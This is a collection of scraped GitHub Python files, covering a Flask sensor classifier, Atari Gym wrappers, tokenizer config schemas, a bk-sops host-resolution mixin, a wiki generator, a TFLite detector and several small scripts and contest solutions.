+{"seq_id":"16851974383","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 2 18:15:39 2019\n\n@author: Mr Mejia\n\"\"\"\n\nfrom flask import Flask, jsonify\nfrom sklearn.externals import joblib\nfrom iswai.sensor_mongodb import SensorMongoDB\n\napp = Flask(__name__)\n\n@app.route('/classify//')\ndef classify(hm, tm):\n \n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n # Make predictions on request data\n data = [hm, tm]\n predictions = model.predict([data])\n \n # return the classification in JSON format\n return jsonify({'clima':predictions[0]})\n\n@app.route('/classify', methods=['POST'])\ndef classify_json():\n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n content = request.get_json()\n \n data = []\n for row in content:\n tm = row['tm']\n hm = row['hm']\n item = [tm, hm]\n data.append(item)\n \n # Make Predictions\n predictions = model.predict(data)\n \n # Return the classification in JSON format\n return jsonify(clima=predictions[0])\n\n\n@app.route('/list', methods=['GET'])\ndef list():\n # Load the saved iris classification model\n model = joblib.load('models/sensor_svc.model')\n \n sensor_mongodb = SensorMongoDB()\n dataframe = sensor_mongodb.getDataframe()\n print(dataframe)\n \n json_data = []\n \n for index, row in dataframe.iterrows():\n tm = row['temperatura']\n hm = row['humedad']\n item = [tm, hm]\n \n category = model.predict([item])[0]\n json_item = {'tm':tm, 'hm':hm, 'clima':category}\n json_data.append(json_item)\n \n return jsonify(Tiempo=json_data)\n\nif __name__ == '__main__':\n app.run()","repo_name":"DuvanSGF/Sifunciona","sub_path":"DataScienceII/ClasesGithub/Nueva carpeta/sensor/iswai/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"12657131896","text":"x=int(input())\nflag=True\ncnt=0\nwhile flag:\n for i in range(2,int(x**0.5)):\n if x%i!=0:\n continue\n cnt=1\n break\n if cnt==0:\n print(x)\n exit()\n cnt=0\n x+=1","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/abc149/abc149_c/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30285600311","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : lhr (airhenry@gmail.com)\n# @Link : http://about.me/air.henry\n\n\nfrom general import gs\nlog=gs.get_logger(__name__,debug=False)\n\nfrom general.gs import cfg,types\nPortType = types.Integer(1, 65535)\n\nOPTS = [\n cfg.StrOpt('redis_server',\n default='localhost',\n help='redis server to connect to '),\n cfg.Opt('redis_port',\n type=PortType,\n default=6379,\n help='redis port number to connect to'),\n cfg.StrOpt('mongo_server',\n default='localhost',\n help='mongo server to connect to '),\n cfg.Opt('mongo_port',\n type=PortType,\n default=27017,\n help='mongo port number to connect to'),\n ]\n\n\ngs.init(__file__,OPTS)\n\n# log=gs.get_logger(__name__,debug=gs.CONF.debug)\n\nlog.debug(\"gs loaded, root is \"+gs.CONF.root_package_name)\n","repo_name":"lhrkkk/general","sub_path":"general/init_gs.py","file_name":"init_gs.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14254706753","text":"import os\nimport pandas as pd\nimport numpy as np\nimport json\nfrom objects import Vertiport, Pad, Aircraft\nfrom copy import deepcopy\n\n\ndef create_vertiport(file_name: str) -> (list, int):\n \"\"\"\n This function creates vertiport objects alongside their pads.\n\n Args:\n file_name (str): vertiport file name that contains its location, pads and number of stands.\n\n Returns:\n vertiport_objects (list): list of built vertiport objects.\n last_id (int): last objects id, to be used for creating other objects.\n\n \"\"\"\n i = 1\n root_path = os.getcwd() + f\"\\\\{file_name}.xlsx\"\n excel_data = pd.ExcelFile(root_path)\n sheet_names = excel_data.sheet_names\n excel_data = pd.read_excel(root_path, sheet_name=sheet_names[0])\n data_dict = excel_data.to_dict(orient='dict')\n vertiport_objects = []\n vertiport_created = False\n for index in data_dict['Name']:\n if type(data_dict['Name'][index]) == str:\n if vertiport_created:\n vertiport_obj.pads = pads\n vertiport_objects.append(deepcopy(vertiport_obj))\n vertiport_obj = Vertiport(i, [], [], json.loads(data_dict['Position'][index]), data_dict['Name'][index], data_dict['Capacity'][index])\n vertiport_created = True\n pads = []\n i += 1\n if data_dict['Pad'][index]:\n pad_obj = Pad(i, data_dict['Pad'][index] if type(data_dict['Pad'][index]) == str else 'pad with no name')\n pads.append(pad_obj)\n i += 1\n elif np.isnan(data_dict['Name'][index]):\n if data_dict['Pad'][index]:\n pad_obj = Pad(i, data_dict['Pad'][index] if type(data_dict['Pad'][index]) == str else 'pad with no name')\n pads.append(pad_obj)\n i += 1\n vertiport_obj.pads = pads\n # vertiport_obj.aircrafts = aircrafts\n vertiport_objects.append(deepcopy(vertiport_obj))\n last_id = i\n return vertiport_objects, last_id\n\n\ndef create_aircrafts(aircraft_schedule_data: dict, last_id: int) -> (list, int):\n \"\"\"\n This function creates aircraft objects demand_schedule_data\n\n Args:\n aircraft_schedule_data (dict): a dictionary that contains every aircraft's \n arrival time.\n last_id (int): previous last objects id, to be used for creating other objects.\n\n Returns:\n demands (list): list of built aircraft objects.\n last_id (int): last objects id, to be used for creating other objects.\n\n \"\"\"\n aircrafts = []\n for i in range(len(aircraft_schedule_data['aircraft_start_time'])):\n aircrafts.append(Aircraft(last_id, 'scheduled', [], aircraft_schedule_data['aircraft_start_time'][i]))\n last_id += 1\n return aircrafts, last_id","repo_name":"moahmmadalizade91/max_time_on_vertiport","sub_path":"create_objects.py","file_name":"create_objects.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38916287873","text":"\"\"\"\n Converting individual lives in the game into separate episodes. In\n general, an episode contains all the steps from the beginning of the game\n until the \"Game over\" screen appears?, which can last for thousands of\n game steps (observations and actions). Usually, in arcade games, the\n player is given several lives, which provide several attempts in the\n game. This transformation splits a full episode into individual small\n episodes for every life that a player has. Not all games support this\n feature (for example, Pong doesn't), but for the supported environments,\n it usually helps to speed up convergence as our episodes become shorter.\n In the beginning of the game, performing a random amount (up to 30) of\n no-op actions. This should stabilize training, but there is no proper\n explanation why it is the case.\n Making an action decision every K steps, where K is usually 4 or 3. On\n intermediate frames, the chosen action is simply repeated. This allows\n training to speed up significantly, as processing every frame with a\n neural network is quite a demanding operation, but the difference\n between consequent frames is usually minor.\n Taking the maximum of every pixel in the last two frames and using it\n as an observation. Some Atari games have a flickering effect, which is\n due to the platform's limitation (Atari has a limited amount of sprites\n that can be shown on a single frame). For a human eye, such quick\n changes are not visible, but they can confuse neural networks.\n Pressing FIRE in the beginning of the game. Some games (including\n Pong and Breakout) require a user to press the FIRE button to start the\n game. In theory, it's possible for a neural network to learn to press FIRE\n itself, but it will require much more episodes to be played. So, we press\n FIRE in the wrapper.\n Scaling every frame down from 210 × 160, with three color frames, into\n a single-color 84 × 84 image. Different approaches are possible. For\n example, the DeepMind paper describes this transformation as taking\n the Y-color channel from the YCbCr color space and then rescaling the\n full image to an 84 × 84 resolution. Some other researchers do grayscale\n transformation, cropping non-relevant parts of the image and then\n scaling down. In the Baselines repository (and in the following example\n code), the latter approach is used.\n Stacking several (usually four) subsequent frames together to give the\n network the information about the dynamics of the game's objects.\n Clipping the reward to −1, 0, and 1 values. The obtained score can vary\n wildly among the games. For example, in Pong you get a score of 1 for\n every ball that your opponent passes behind you. However, in some\n games, like KungFu, you get a reward of 100 for every enemy killed.\n This spread in reward values makes our loss have completely different\n scales between the games, which makes it harder to find common\n hyperparameters for a set of games. To fix this, reward just gets clipped\n to the range [−1...1].\n Converting observations from unsigned bytes to float32 values. The\n screen obtained from the emulator is encoded as a tensor of bytes with\n values from 0 to 255, which is not the best representation for a neural\n network. 
So, we need to convert the image into floats and rescale the\n values to the range [0.0…1.0].\n\"\"\"\n\nimport cv2\nimport gym\nimport gym.spaces\nimport numpy as np\nimport collections\n\n\nclass FireResetEnv(gym.Wrapper):\n def __init__(self, env=None):\n super(FireResetEnv, self).__init__(env)\n assert env.unwrapped.get_action_meanings()[1] == 'FIRE'\n assert len(env.unwrapped.get_action_meanings()) >= 3\n\n def step(self, action):\n return self.env.step(action)\n\n def reset(self, **kwargs):\n self.env.reset()\n obs, _, done, _ = self.env.step(1)\n if done:\n self.env.reset()\n obs, _, done, _ = self.env.step(2)\n if done:\n self.env.reset()\n return obs\n\n\nclass MaxAndSkipEnv(gym.Wrapper):\n def __init__(self, env=None, skip=4):\n \"\"\"\n Return only every skip frame\n :param env:\n :param skip:\n \"\"\"\n super(MaxAndSkipEnv, self).__init__(env)\n self._obs_buffer = collections.deque(maxlen=2)\n self._skip = skip\n\n def step(self, action):\n total_reward = 0.0\n done = None\n info = None\n for _ in range(self._skip):\n obs, reward, done, info = self.env.step(action)\n self._obs_buffer.append(obs)\n total_reward += reward\n if done:\n break\n max_frame = np.max(np.stack(self._obs_buffer), axis=0)\n return max_frame, total_reward, done, info\n\n def _reset(self):\n self._obs_buffer.clear()\n obs = self.env.reset()\n self._obs_buffer.append(obs)\n return obs\n\n\nclass ProcessFrame84(gym.ObservationWrapper):\n \"\"\"\n The goal of this wrapper is to convert input observations from the emulator,\n which normally has a resolution of 210 × 160 pixels with RGB color\n channels, to a grayscale 84 × 84 image. It does this using a colorimetric\n grayscale conversion (which is closer to human color perception than a\n simple averaging of color channels), resizing the image and cropping the top\n and bottom parts of the result.\n \"\"\"\n def __init__(self, env=None):\n super(ProcessFrame84, self).__init__(env)\n self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1),\n dtype=np.uint8)\n\n def observation(self, observation):\n return ProcessFrame84.process(observation)\n\n @staticmethod\n def process(frame):\n if frame.size == 210 * 160 * 3:\n img = np.reshape(frame, (210, 160, 3)).astype(np.float32)\n else:\n assert False, \"Unknown resolution\"\n img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 \\\n + img[:, :, 2] * .114\n resized_screen = cv2.resize(img, (84, 110), interpolation=cv2.INTER_AREA)\n x_t = resized_screen[18:102, :]\n x_t = np.reshape(x_t, [84, 84, 1])\n return x_t.astype(np.uint8)\n\n\nclass BufferWrapper(gym.ObservationWrapper):\n \"\"\"\n This class creates a stack of subsequent frames along the first dimension and\n returns them as an observation. The purpose is to give the network an idea\n about the dynamics of the objects, such as the speed and direction of the ball\n in Pong or how enemies are moving. 
This is very important information,\n which it is not possible to obtain from a single image.\n \"\"\"\n def __init__(self, env, n_steps, dtype=np.float32):\n super(BufferWrapper, self).__init__(env)\n self.dtype = dtype\n self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)\n old_space = env.observation_space\n self.observation_space = gym.spaces.Box(old_space.low.repeat(n_steps, axis=0),\n old_space.high.repeat(n_steps, axis=0),\n dtype=dtype)\n\n def reset(self, **kwargs):\n self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)\n return self.observation(self.env.reset())\n\n def observation(self, observation):\n self.buffer[:-1] = self.buffer[1:]\n self.buffer[-1] = observation\n return self.buffer\n\n\nclass ImageToPyTorch(gym.ObservationWrapper):\n \"\"\"\n This simple wrapper changes the shape of the observation from HWC to the\n CHW format required by PyTorch. The input shape of the tensor has a color\n channel as the last dimension, but PyTorch's convolution layers assume the\n color channel to be the first dimension.\n\n \"\"\"\n def __init__(self, env):\n super(ImageToPyTorch, self).__init__(env)\n old_shape = self.observation_space.shape\n self.observation_space = gym.spaces.Box(low=0.0,\n high=1.0,\n shape=(old_shape[-1],\n old_shape[0],\n old_shape[1]),\n dtype=np.float32)\n\n def observation(self, observation):\n return np.moveaxis(observation, 2, 0)\n\n\nclass ScaledFloatFrame(gym.ObservationWrapper):\n def observation(self, observation):\n return np.array(observation).astype(np.float32) / 255.0\n\n\ndef make_env(env_name):\n env = gym.make(env_name)\n env = MaxAndSkipEnv(env)\n env = FireResetEnv(env)\n env = ProcessFrame84(env)\n env = ImageToPyTorch(env)\n env = BufferWrapper(env, 4)\n return ScaledFloatFrame(env)","repo_name":"GuyRobot/RL-Python","sub_path":"DeepQLearning/Wrapper.py","file_name":"Wrapper.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
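A quick sanity check of the wrapper stack, using the pre-0.26 Gym step/reset API this code targets: after make_env, observations should be float32 arrays of shape (4, 84, 84) scaled into [0, 1], ready for a PyTorch convolutional network. Pong is only an example environment name:

from Wrapper import make_env   # module name follows the file above

env = make_env('PongNoFrameskip-v4')
obs = env.reset()
print(obs.shape, obs.dtype, obs.min(), obs.max())   # (4, 84, 84) float32 0.0 ... 1.0

obs, reward, done, info = env.step(env.action_space.sample())
print(obs.shape, reward, done)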
+{"seq_id":"10787821259","text":"from hydra.core.config_store import ConfigStore\nfrom omegaconf import MISSING\nfrom pydantic import validator\nfrom pydantic.dataclasses import dataclass\n\n\n@dataclass\nclass DecoderConfig:\n _target_: str = MISSING\n\n\n@dataclass\nclass BPEDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.BPEDecoder\"\n suffix: str = \"\"\n\n\n@dataclass\nclass ByteLevelDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.ByteLevel\"\n\n\n@dataclass\nclass CTCDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.CTC\"\n pad_token: str = \"\"\n word_delimiter_token: str = \"|\"\n cleanup: bool = True\n\n\n@dataclass\nclass MetaspaceDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.Metaspace\"\n replacement: str = \"_\"\n add_prefix_space: bool = True\n\n @validator(\"replacement\")\n def validate_replacement(cls, replacement: str) -> str:\n if len(replacement) > 1:\n raise ValueError(f\"len(replacement) must be 1, got: {len(replacement)}\")\n return replacement\n\n\n@dataclass\nclass WordPieceDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.Metaspace\"\n prefix: str = \"##\"\n cleanup: bool = True\n\n\ndef setup_config() -> None:\n cs = ConfigStore.instance()\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"bpe_decoder_schema\",\n node=BPEDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"byte_level_decoder_schema\",\n node=ByteLevelDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"ctc_decoder_schema\",\n node=CTCDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"metaspace_decoder_schema\",\n node=MetaspaceDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"word_piece_decoder_schema\",\n node=WordPieceDecoderConfig,\n )\n","repo_name":"emkademy/cybulde-data-preparation","sub_path":"cybulde/config_schemas/tokenization/decoder_schema.py","file_name":"decoder_schema.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"5447816175","text":"from fpdf import FPDF\nimport glob\nfrom pathlib import Path\n\nfiles = glob.glob(\"file/*.txt\")\npdf = FPDF(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\nfor file in files:\n title = Path(file).stem.title()\n pdf.add_page()\n pdf.set_font(family=\"Times\", style=\"B\", size=20)\n pdf.cell(w=150, h=7, txt=title)\n pdf.ln(10)\n with open(file, \"r\") as content:\n content = content.read()\n pdf.set_font(family=\"Times\", size=12)\n pdf.multi_cell(w=180, h=6, txt=content, align=\"J\")\n\npdf.output(\"studpro.pdf\")","repo_name":"muhlisasri/app4-invoice-generation","sub_path":"studentproject/studpro.py","file_name":"studpro.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"113640332","text":"import sys\nsys.setrecursionlimit(10 ** 9)\ninput = sys.stdin.readline\n\ndef DFS(v):\n for i in tree[v]:\n if visited[i] == 0:\n visited[i] = v\n DFS(i)\n\nn = int(input())\ntree = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n parent, child = map(int, input().split())\n tree[parent].append(child)\n tree[child].append(parent)\nvisited = [0] * (n + 1)\n\nDFS(1)\nfor parent in visited[2:]:\n print(parent)","repo_name":"cosmos-1885/Algorithm","sub_path":"알고리즘 분류/그래프 탐색/No.11725.py","file_name":"No.11725.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30111772618","text":"import csv\nimport json\n\nwith open(\"C:/Temp/students.json\", \"r\", encoding=\"utf-8\") as fin, \\\n open(\"C:/Temp/students_data.csv\", \"w\", encoding=\"utf-8\", newline=\"\") as fout:\n \n students = json.load(fin)\n flds=[\"name\",\"phone\"]\n data = [dict(zip(flds,[s[flds[0]],s[flds[1]]])) for s in students if s[\"age\"]>=18 and s[\"progress\"]>=75]\n \n writer = csv.DictWriter(fout, fieldnames=flds)\n writer.writeheader()\n writer.writerows(sorted(data, key=lambda x: x[flds[0]]))","repo_name":"vepankin/python_stepik","sub_path":"json_students_data.py","file_name":"json_students_data.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26527207627","text":"# -*- coding: utf-8 -*-\nfrom gcloud.conf import settings\nfrom gcloud.utils.ip import get_ip_by_regex, extract_ip_from_ip_str\nfrom pipeline_plugins.base.utils.inject import supplier_account_for_business\nfrom pipeline_plugins.components.collections.sites.open.cc.base import cc_get_host_by_innerip_with_ipv6\nfrom pipeline_plugins.components.collections.sites.open.cc.ipv6_utils import (\n cc_get_host_by_innerip_with_ipv6_across_business,\n)\nfrom pipeline_plugins.components.utils.sites.open.utils import get_biz_ip_from_frontend, get_biz_ip_from_frontend_hybrid\n\n\nclass GetJobTargetServerMixin(object):\n def get_target_server_ipv6(self, executor, biz_cc_id, ip_str, logger_handle, data):\n supplier_account = supplier_account_for_business(biz_cc_id)\n logger_handle.info(\"[get_target_server_ipv6] start search this ip:{}\".format(ip_str))\n host_result = cc_get_host_by_innerip_with_ipv6(executor, biz_cc_id, ip_str, supplier_account)\n logger_handle.info(\n \"[get_target_server_ipv6] start search this ip: {} end, result={}\".format(ip_str, host_result)\n )\n if not host_result[\"result\"]:\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确,ip_list={}\".format(host_result.get(\"message\"))\n return False, {}\n\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_result[\"data\"]]}\n\n def get_target_server_ipv6_across_business(self, executor, biz_cc_id, ip_str, logger_handle, data):\n \"\"\"\n step 1: 去本业务查这些ip,得到两个列表,本业务查询到的host, 本业务查不到的ip列表\n step 2: 对于本业务查不到的host, 去全业务查询,查不到的话则报错,将查到的host_id 与 本业务的 host_id 进行合并\n \"\"\"\n logger_handle.info(\"[get_target_server_ipv6_across_business] start search ip, ip_str={}\".format(ip_str))\n supplier_account = supplier_account_for_business(biz_cc_id)\n # 去本业务查\n try:\n (\n host_list,\n ipv4_not_find_list,\n ipv4_with_cloud_not_find_list,\n ipv6_not_find_list,\n ipv6_with_cloud_not_find_list,\n ) = cc_get_host_by_innerip_with_ipv6_across_business(executor, biz_cc_id, ip_str, supplier_account)\n except Exception as e:\n logger_handle.exception(\n f\"[get_target_server_ipv6_across_business] call \"\n f\"cc_get_host_by_innerip_with_ipv6_across_business error: {e}\"\n )\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确:{}\".format(e)\n return False, {}\n\n ip_not_find_str = \",\".join(\n ipv4_not_find_list + ipv6_not_find_list + ipv4_with_cloud_not_find_list + ipv6_with_cloud_not_find_list\n )\n logger_handle.info(\n \"[get_target_server_ipv6_across_business] not find this ip, ip_not_find_str={}\".format(ip_not_find_str)\n )\n # 剩下的ip去全业务查\n host_result = cc_get_host_by_innerip_with_ipv6(\n executor, None, ip_not_find_str, supplier_account, is_biz_set=True\n )\n logger_handle.info(\n \"[get_target_server_ipv6_across_business] start search this ip:{}, result:{}\".format(\n ip_not_find_str, host_list\n )\n )\n if not host_result[\"result\"]:\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确,ip_list={}\".format(host_result.get(\"message\"))\n return False, {}\n host_data = host_result[\"data\"] + host_list\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_data]}\n\n def get_target_server(\n self,\n executor,\n biz_cc_id,\n data,\n ip_str,\n logger_handle,\n ip_is_exist=False,\n is_across=False,\n ignore_ex_data=False,\n ):\n if settings.ENABLE_IPV6:\n if is_across:\n return self.get_target_server_ipv6_across_business(executor, biz_cc_id, ip_str, logger_handle, data)\n return self.get_target_server_ipv6(executor, biz_cc_id, ip_str, logger_handle, data)\n # 获取IP\n clean_result, ip_list = 
get_biz_ip_from_frontend(\n ip_str,\n executor,\n biz_cc_id,\n data,\n logger_handle=logger_handle,\n is_across=is_across,\n ip_is_exist=ip_is_exist,\n ignore_ex_data=ignore_ex_data,\n )\n if not clean_result:\n return False, {}\n\n return True, {\"ip_list\": ip_list}\n\n def get_target_server_hybrid(self, executor, biz_cc_id, data, ip_str, logger_handle):\n if settings.ENABLE_IPV6:\n return self.get_target_server_ipv6_across_business(executor, biz_cc_id, ip_str, logger_handle, data)\n # 获取IP\n clean_result, ip_list = get_biz_ip_from_frontend_hybrid(executor, ip_str, biz_cc_id, data)\n if not clean_result:\n return False, {}\n\n return True, {\"ip_list\": ip_list}\n\n def get_target_server_biz_set(\n self, executor, ip_table, supplier_account, logger_handle, ip_key=\"ip\", need_build_ip=True\n ):\n def build_ip_str_from_table():\n ip_list = []\n # 第二步 分析表格, 得到 ipv6, host_id,ipv4, 三种字符串,并连接成字符串\n for _ip in ip_table:\n ipv6_list, ipv4_list, host_id_list, *_ = extract_ip_from_ip_str(_ip[ip_key]) # noqa\n host_id_list = [str(host_id) for host_id in host_id_list]\n ip_list.extend(\n [\n *[\"{}:[{}]\".format(_ip.get(\"bk_cloud_id\", 0), item) for item in ipv6_list],\n *host_id_list,\n *[\"{}:{}\".format(_ip.get(\"bk_cloud_id\", 0), item) for item in ipv4_list],\n ]\n )\n return \",\".join(ip_list)\n\n if settings.ENABLE_IPV6:\n # 第一步 查询这个业务集下所有的业务id, 得到bk_biz_ids\n ip_str = ip_table\n # 在业务集的执行方案中,可能不需要额外处理ip,这种情况直接透传就好\n if need_build_ip:\n ip_str = build_ip_str_from_table()\n logger_handle.info(\"[get_target_server_biz_set] build ip_str, ip_str is {}\".format(ip_str))\n host_result = cc_get_host_by_innerip_with_ipv6(executor, None, ip_str, supplier_account, is_biz_set=True)\n logger_handle.info(\"[get_target_server_biz_set] search ip end, host_result is {}\".format(host_result))\n if not host_result[\"result\"]:\n return False, {}\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_result[\"data\"]]}\n\n # 拼装ip_list, bk_cloud_id为空则值为0\n ip_list = [\n {\"ip\": ip, \"bk_cloud_id\": int(_ip[\"bk_cloud_id\"]) if str(_ip[\"bk_cloud_id\"]) else 0}\n for _ip in ip_table\n for ip in get_ip_by_regex(_ip[ip_key])\n ]\n\n return True, {\"ip_list\": ip_list}\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"pipeline_plugins/components/collections/sites/open/job/ipv6_base.py","file_name":"ipv6_base.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"}
+{"seq_id":"70139779690","text":"from conf import PROJECT_ROOT_DIR\nimport os\nimport pandas as pd\nimport numpy as np\nimport re\n\nfrom git_status import get_repo_list\n\n\ndef get_wiki_status_color(input_text):\n if input_text is None or input_text == 'inactive':\n result_text = \":heavy_multiplication_x:\"\n else:\n result_text = \":heavy_check_mark:\"\n return '{}'.format(result_text)\n\n\ndef get_wiki_rating(input_rating):\n result_text = ''\n if input_rating is not None and not np.isnan(input_rating):\n rating = int(input_rating)\n result_text = ':star:x{}'.format(rating)\n return '{}'.format(result_text)\n\n\ndef generate_wiki_per_category(output_path, update_readme: bool = True):\n \"\"\"\n\n :param update_readme:\n :param output_path:\n \"\"\"\n repo_df = get_repo_list()\n for category in repo_df['category'].unique():\n category_df = repo_df[repo_df['category'] == category].copy()\n url_md_list = []\n for idx, irow in category_df[['name', 'url']].iterrows():\n url_md_list.append('[{}]({})'.format(irow['name'], irow['url']))\n\n formatted_df = pd.DataFrame({\n 'repo': url_md_list,\n 'comment': category_df['comment'].apply(lambda x: '{}'.format(x)),\n 'created_at': category_df['created_at'].apply(lambda x: '{}'.format(x)),\n 'last_commit': category_df['last_commit'].apply(lambda x: '{}'.format(x)),\n 'star_count': category_df['star_count'].apply(lambda x: '{}'.format(x)),\n 'repo_status': category_df['repo_status'],\n 'rating': category_df['rating']\n })\n # add color for the status\n formatted_df = formatted_df.sort_values(by=['rating', 'star_count'], ascending=False).reset_index(drop=True)\n formatted_df['repo_status'] = formatted_df['repo_status'].apply(lambda x: get_wiki_status_color(x))\n formatted_df['rating'] = formatted_df['rating'].apply(lambda x: get_wiki_rating(x))\n formatted_df.columns = ['{}'.format(x) for x in formatted_df.columns]\n\n clean_category_name = category.lower().replace(' ', '_')\n output_path_full = os.path.join(output_path, '{}.md'.format(clean_category_name))\n with open(output_path_full, 'w') as f:\n f.write(formatted_df.to_markdown(index=False))\n print('wiki generated in [{}]'.format(output_path_full))\n\n if update_readme:\n check_str = '[PLACEHOLDER_START:{}]'.format(clean_category_name)\n with open(os.path.join(PROJECT_ROOT_DIR, 'README.md')) as f:\n all_read_me = f.read()\n if check_str not in all_read_me:\n print(f'section {check_str} not found')\n continue\n\n # only display top 5, then expandable for extra 5\n with open(os.path.join(PROJECT_ROOT_DIR, 'README.md'), 'w') as f:\n\n table_str = formatted_df.iloc[:15].to_markdown(index=False)\n new_str = f\" \\n\"\n new_str += table_str\n new_str += f\"\"\n\n search_start = re.escape(''.format(clean_category_name))\n search_end = re.escape(''.format(clean_category_name))\n pattern_s = re.compile(r'{}.*?{}'.format(search_start, search_end), re.DOTALL)\n write_str = re.sub(pattern_s, new_str, all_read_me)\n f.write(write_str)\n\n\nif __name__ == '__main__':\n local_path = os.path.join(PROJECT_ROOT_DIR, 'generated_wiki')\n generate_wiki_per_category(local_path)\n","repo_name":"firmai/financial-machine-learning","sub_path":"wiki_gen.py","file_name":"wiki_gen.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":5070,"dataset":"github-code","pt":"53"}
+{"seq_id":"622273703","text":"import numpy as np\nimport tensorflow as tf\nimport cv2\n\nfrom object_detector_detection_api import ObjectDetectorDetectionAPI, \\\n PATH_TO_LABELS, NUM_CLASSES\n\n\nclass ObjectDetectorLite(ObjectDetectorDetectionAPI):\n def __init__(self, model_path='converted_shopmodel3.tflite'):\n \"\"\"\n Builds Tensorflow graph, load model and labels\n \"\"\"\n\n # Load lebel_map\n self._load_label(PATH_TO_LABELS, NUM_CLASSES, use_disp_name=True)\n\n # Define lite graph and Load Tensorflow Lite model into memory\n self.interpreter = tf.lite.Interpreter(\n model_path=model_path)\n self.interpreter.allocate_tensors()\n self.input_details = self.interpreter.get_input_details()\n self.output_details = self.interpreter.get_output_details()\n\n def detect(self, image, threshold=0.1):\n \"\"\"\n Predicts person in frame with threshold level of confidence\n Returns list with top-left, bottom-right coordinates and list with labels, confidence in %\n \"\"\"\n\n # Resize and normalize image for network input\n frame = cv2.resize(image, (64, 64))\n frame = np.expand_dims(frame, axis=0)\n frame = (2.0 / 255.0) * frame - 1.0\n frame = frame.astype('float32')\n\n # run model\n self.interpreter.set_tensor(self.input_details[0]['index'], frame)\n self.interpreter.invoke()\n\n # get results\n boxes = self.interpreter.get_tensor(\n self.output_details[0]['index'])\n print(boxes)\n classes = self.interpreter.get_tensor(\n self.output_details[1]['index'])\n scores = self.interpreter.get_tensor(\n self.output_details[2]['index'])\n num = self.interpreter.get_tensor(\n self.output_details[3]['index'])\n\n # Find detected boxes coordinates\n return self._boxes_coordinates(image,\n np.squeeze(boxes[0]),\n np.squeeze(classes[0]+1).astype(np.int32),\n np.squeeze(scores[0]),\n min_score_thresh=threshold)\n\n def close(self):\n pass\n\n\nif __name__ == '__main__':\n detector = ObjectDetectorLite()\n\n image = cv2.cvtColor(cv2.imread('dog.jpg'), cv2.COLOR_BGR2RGB)\n\n result = detector.detect(image, 0.4)\n print(result)\n\n for obj in result:\n print('coordinates: {} {}. class: \"{}\". confidence: {:.2f}'.\n format(obj[0], obj[1], obj[3], obj[2]))\n\n cv2.rectangle(image, obj[0], obj[1], (0, 255, 0), 2)\n cv2.putText(image, '{}: {:.2f}'.format(obj[3], obj[2]),\n (obj[0][0], obj[0][1] - 5),\n cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 2)\n\n cv2.imwrite('r1.jpg', cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\n detector.close()\n","repo_name":"Pixel-Pi/CVProject","sub_path":"mobile_detector/object_detector_detection_api_lite.py","file_name":"object_detector_detection_api_lite.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
